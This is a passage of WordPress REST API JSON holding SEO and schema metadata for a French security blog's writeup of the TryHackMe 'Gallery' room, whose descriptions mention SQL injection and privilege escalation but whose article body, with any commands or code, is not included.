\/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.9\" \/>\n\t\t<meta property=\"og:locale\" content=\"fr_FR\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Mika&#039;s Blog | Sysadmin, Network &amp; Infosec\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"TryHackMe | Gallery | Writeup | Mika&#039;s Blog\" \/>\n\t\t<meta property=\"og:description\" content=\"Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png\" \/>\n\t\t<meta property=\"og:image:width\" content=\"219\" \/>\n\t\t<meta property=\"og:image:height\" content=\"230\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-05-24T16:02:46+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2022-02-12T12:11:23+00:00\" \/>\n\t\t<meta property=\"article:author\" content=\"mikadmin\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary\" \/>\n\t\t<meta name=\"twitter:title\" content=\"TryHackMe | Gallery | Writeup | Mika&#039;s Blog\" \/>\n\t\t<meta name=\"twitter:description\" content=\"Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user.\" \/>\n\t\t<meta name=\"twitter:creator\" content=\"@mika_sec\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png\" \/>\n\t\t<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t\t<meta name=\"twitter:data1\" content=\"Mika\" \/>\n\t\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#article\",\"name\":\"TryHackMe | Gallery | Writeup | Mika's Blog\",\"headline\":\"[TryHackme] \\u2013 Gallery\",\"author\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/author\\\/mikadmin\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/2_ethical-e1603989983373.jpg\",\"width\":150,\"height\":50},\"datePublished\":\"2021-05-24T18:02:46+02:00\",\"dateModified\":\"2022-02-12T13:11:23+01:00\",\"inLanguage\":\"fr-FR\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#webpage\"},\"articleSection\":\"infosec, system, cve, linux, privesc, sqli, tryhackme, writeup\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/mikadmin.fr\\\/blog\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/category\\\/system\\\/#listItem\",\"name\":\"system\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/category\\\/system\\\/#listItem\",\"position\":2,\"name\":\"system\",\"item\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/category\\\/system\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#listItem\",\"name\":\"[TryHackme] \\u2013 Gallery\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#listItem\",\"position\":3,\"name\":\"[TryHackme] \\u2013 Gallery\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/category\\\/system\\\/#listItem\",\"name\":\"system\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/#organization\",\"name\":\"Mika's Blog\",\"description\":\"Sysadmin, Network & Infosec\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/favicon.ico\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#organizationLogo\",\"width\":16,\"height\":16},\"image\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#organizationLogo\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/author\\\/mikadmin\\\/#author\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/author\\\/mikadmin\\\/\",\"name\":\"Mika\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#authorImage\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/qV4LCrel_400x400-1-150x150.jpg\",\"width\":96,\"height\":96,\"caption\":\"Mika\"},\"sameAs\":[\"mikadmin\",\"https:\\\/\\\/twitter.com\\\/mika_sec\"]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#webpage\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/\",\"name\":\"TryHackMe | Gallery | Writeup | Mika's Blog\",\"description\":\"Can you exploit our image gallery system ? Gallery | Writeup | TryHackMe | SQLi | RCE | CMS | GTFOBins | Linux Privilege Escalation | Pentest\",\"inLanguage\":\"fr-FR\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/author\\\/mikadmin\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/author\\\/mikadmin\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/2_ethical-e1603989983373.jpg\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#mainImage\",\"width\":150,\"height\":50},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/tryhackme-gallery\\\/#mainImage\"},\"datePublished\":\"2021-05-24T18:02:46+02:00\",\"dateModified\":\"2022-02-12T13:11:23+01:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/\",\"name\":\"Mika's Blog\",\"description\":\"Sysadmin, Network & Infosec\",\"inLanguage\":\"fr-FR\",\"publisher\":{\"@id\":\"https:\\\/\\\/mikadmin.fr\\\/blog\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"TryHackMe | Gallery | Writeup | Mika's Blog","description":"Can you exploit our image gallery system ? Gallery | Writeup | TryHackMe | SQLi | RCE | CMS | GTFOBins | Linux Privilege Escalation | Pentest","canonical_url":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/","robots":"max-image-preview:large","keywords":"tryhackme,batblog,ctf,writeup,pentest,oscp,sudo,privesc,cve,linux,sqli,infosec,system","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#article","name":"TryHackMe | Gallery | Writeup | Mika's Blog","headline":"[TryHackme] \u2013 Gallery","author":{"@id":"https:\/\/mikadmin.fr\/blog\/author\/mikadmin\/#author"},"publisher":{"@id":"https:\/\/mikadmin.fr\/blog\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/10\/2_ethical-e1603989983373.jpg","width":150,"height":50},"datePublished":"2021-05-24T18:02:46+02:00","dateModified":"2022-02-12T13:11:23+01:00","inLanguage":"fr-FR","mainEntityOfPage":{"@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#webpage"},"isPartOf":{"@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#webpage"},"articleSection":"infosec, system, cve, linux, privesc, sqli, tryhackme, writeup"},{"@type":"BreadcrumbList","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog#listItem","position":1,"name":"Home","item":"https:\/\/mikadmin.fr\/blog","nextItem":{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog\/category\/system\/#listItem","name":"system"}},{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog\/category\/system\/#listItem","position":2,"name":"system","item":"https:\/\/mikadmin.fr\/blog\/category\/system\/","nextItem":{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#listItem","name":"[TryHackme] \u2013 Gallery"},"previousItem":{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#listItem","position":3,"name":"[TryHackme] \u2013 Gallery","previousItem":{"@type":"ListItem","@id":"https:\/\/mikadmin.fr\/blog\/category\/system\/#listItem","name":"system"}}]},{"@type":"Organization","@id":"https:\/\/mikadmin.fr\/blog\/#organization","name":"Mika's Blog","description":"Sysadmin, Network & Infosec","url":"https:\/\/mikadmin.fr\/blog\/","logo":{"@type":"ImageObject","url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/10\/favicon.ico","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#organizationLogo","width":16,"height":16},"image":{"@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#organizationLogo"}},{"@type":"Person","@id":"https:\/\/mikadmin.fr\/blog\/author\/mikadmin\/#author","url":"https:\/\/mikadmin.fr\/blog\/author\/mikadmin\/","name":"Mika","image":{"@type":"ImageObject","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#authorImage","url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/10\/qV4LCrel_400x400-1-150x150.jpg","width":96,"height":96,"caption":"Mika"},"sameAs":["mikadmin","https:\/\/twitter.com\/mika_sec"]},{"@type":"WebPage","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#webpage","url":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/","name":"TryHackMe | Gallery | Writeup | Mika's Blog","description":"Can you exploit our image gallery system ? Gallery | Writeup | TryHackMe | SQLi | RCE | CMS | GTFOBins | Linux Privilege Escalation | Pentest","inLanguage":"fr-FR","isPartOf":{"@id":"https:\/\/mikadmin.fr\/blog\/#website"},"breadcrumb":{"@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#breadcrumblist"},"author":{"@id":"https:\/\/mikadmin.fr\/blog\/author\/mikadmin\/#author"},"creator":{"@id":"https:\/\/mikadmin.fr\/blog\/author\/mikadmin\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/10\/2_ethical-e1603989983373.jpg","@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#mainImage","width":150,"height":50},"primaryImageOfPage":{"@id":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/#mainImage"},"datePublished":"2021-05-24T18:02:46+02:00","dateModified":"2022-02-12T13:11:23+01:00"},{"@type":"WebSite","@id":"https:\/\/mikadmin.fr\/blog\/#website","url":"https:\/\/mikadmin.fr\/blog\/","name":"Mika's Blog","description":"Sysadmin, Network & Infosec","inLanguage":"fr-FR","publisher":{"@id":"https:\/\/mikadmin.fr\/blog\/#organization"}}]},"og:locale":"fr_FR","og:site_name":"Mika's Blog | Sysadmin, Network &amp; Infosec","og:type":"article","og:title":"TryHackMe | Gallery | Writeup | Mika's Blog","og:description":"Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user.","og:url":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/","og:image":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png","og:image:secure_url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png","og:image:width":"219","og:image:height":"230","article:published_time":"2021-05-24T16:02:46+00:00","article:modified_time":"2022-02-12T12:11:23+00:00","article:author":"mikadmin","twitter:card":"summary","twitter:title":"TryHackMe | Gallery | Writeup | Mika's Blog","twitter:description":"Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user.","twitter:creator":"@mika_sec","twitter:image":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png","twitter:label1":"\u00c9crit par","twitter:data1":"Mika","twitter:label2":"Estimation du temps de lecture","twitter:data2":"2 minutes"},"aioseo_meta_data":{"post_id":"1694","title":"TryHackMe | Gallery | Writeup | #site_title&nbsp;&nbsp;","description":"Can you exploit our image gallery system ? Gallery | Writeup | TryHackMe | SQLi | RCE | CMS | GTFOBins | Linux Privilege Escalation | Pentest","keywords":[{"label":"tryhackme","value":"tryhackme"},{"label":"batblog","value":"batblog"},{"label":"ctf","value":"ctf"},{"label":"writeup","value":"writeup"},{"label":"pentest","value":"pentest"},{"label":"oscp","value":"oscp"},{"label":"sudo","value":"sudo"},{"label":"privesc","value":"privesc"}],"keyphrases":{"focus":{"keyphrase":"TryHackMe","score":100,"analysis":{"keyphraseInTitle":{"title":"Focus keyphrase in SEO title","description":"Focus keyphrase found in SEO title.","score":9,"maxScore":9,"error":0},"keyphraseInDescription":{"title":"Focus keyphrase in meta description","description":"Focus keyphrase found in meta description.","score":9,"maxScore":9,"error":0},"keyphraseLength":{"title":"Focus keyphrase length","description":"Good job!","score":9,"maxScore":9,"error":0,"length":1},"keyphraseInURL":{"title":"Focus keyphrase in URL","description":"Focus keyphrase used in the URL.","score":5,"maxScore":5,"error":0},"keyphraseInIntroduction":{"title":"Focus keyphrase in introduction","description":"Your Focus keyphrase appears in the first paragraph. Well done!","score":9,"maxScore":9,"error":0},"keyphraseInSubHeadings":[],"keyphraseInImageAlt":{"title":"Focus keyphrase in image alt attributes","description":"Focus keyphrase found in image alt attribute(s).","score":9,"maxScore":9,"error":0}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":"TryHackMe | Gallery | Writeup | #site_title&nbsp;","og_description":"Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user.","og_object_type":"default","og_image_type":"content","og_image_url":"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png","og_image_width":"219","og_image_height":"230","og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":[],"twitter_use_og":true,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[],"defaultGraph":"Article","defaultPostTypeGraph":""},"schema_type":"default","schema_type_options":"{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}","pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","location":null,"local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":null,"created":"2021-05-24 13:37:22","updated":"2025-06-17 16:28:32","seo_analyzer_scan_date":null},"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1694","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1694"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1694\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/45"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1694"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1694"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}